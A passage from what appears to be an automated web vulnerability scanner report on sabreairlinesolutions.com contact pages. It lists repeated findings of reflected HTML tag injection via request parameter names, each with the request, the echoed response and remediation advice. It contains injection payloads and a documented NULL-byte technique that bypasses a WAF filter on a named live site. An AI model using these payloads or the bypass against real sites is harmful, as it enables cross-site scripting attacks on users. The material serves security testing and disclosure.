GET /home/contact/airports?%00ab78d<a>f372b6bb1f8=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321483; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>f372b6bb1f8=1">airports?%00ab78d<a>f372b6bb1f8=1</a> ...[SNIP]...
3.63. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airports/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9d17"><a>b085801efdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9d17"><a>b085801efdc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/airports/?%00f9d17"><a>b085801efdc=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321423; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/airports/?%00f9d17"><a>b085801efdc=1"> ...[SNIP]...
3.64. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airports/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %007842c<a>5631a4947eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7842c<a>5631a4947eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/airports/?%007842c<a>5631a4947eb=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321423; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>5631a4947eb=1">?%007842c<a>5631a4947eb=1</a> ...[SNIP]...
3.65. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/media_relations
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e0eb"><a>c644884f893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0eb"><a>c644884f893 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/media_relations?%002e0eb"><a>c644884f893=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321488; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/media_relations?%002e0eb"><a>c644884f893=1"> ...[SNIP]...
3.66. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/media_relations
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005296f<a>c26ff4d9c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5296f<a>c26ff4d9c0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/media_relations?%005296f<a>c26ff4d9c0=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321488; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>c26ff4d9c0=1">media relations?%005296f<a>c26ff4d9c0=1</a> ...[SNIP]...
3.67. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/media_relations/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008df90<a>37ff3b03616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8df90<a>37ff3b03616 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/media_relations/?%008df90<a>37ff3b03616=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321436; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>37ff3b03616=1">?%008df90<a>37ff3b03616=1</a> ...[SNIP]...
3.68. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/media_relations/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ead24"><a>e7965e1db76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ead24"><a>e7965e1db76 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/media_relations/?%00ead24"><a>e7965e1db76=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321436; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/media_relations/?%00ead24"><a>e7965e1db76=1"> ...[SNIP]...
3.69. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_sales
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001ec7c"><a>3f7052a6597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1ec7c"><a>3f7052a6597 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_sales?%001ec7c"><a>3f7052a6597=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/product_sales?%001ec7c"><a>3f7052a6597=1"> ...[SNIP]...
3.70. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_sales
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %006dd6e<a>c236508982f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd6e<a>c236508982f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_sales?%006dd6e<a>c236508982f=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>c236508982f=1">product sales?%006dd6e<a>c236508982f=1</a> ...[SNIP]...
3.71. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_sales/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0099963<a>2a2ea4d5865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99963<a>2a2ea4d5865 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_sales/?%0099963<a>2a2ea4d5865=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>2a2ea4d5865=1">?%0099963<a>2a2ea4d5865=1</a> ...[SNIP]...
3.72. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_sales/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0076d86"><a>d13558ba028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76d86"><a>d13558ba028 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_sales/?%0076d86"><a>d13558ba028=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/product_sales/?%0076d86"><a>d13558ba028=1"> ...[SNIP]...
3.73. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_support_and_services
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d46ba"><a>f8bc401d242 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d46ba"><a>f8bc401d242 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/product_support_and_services?%00d46ba"><a>f8bc401d242=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/product_support_and_services?%00d46ba"><a>f8bc401d242=1"> ...[SNIP]...
3.74. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/product_support_and_services
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0059a0b<a>b4a625dc95a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59a0b<a>b4a625dc95a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
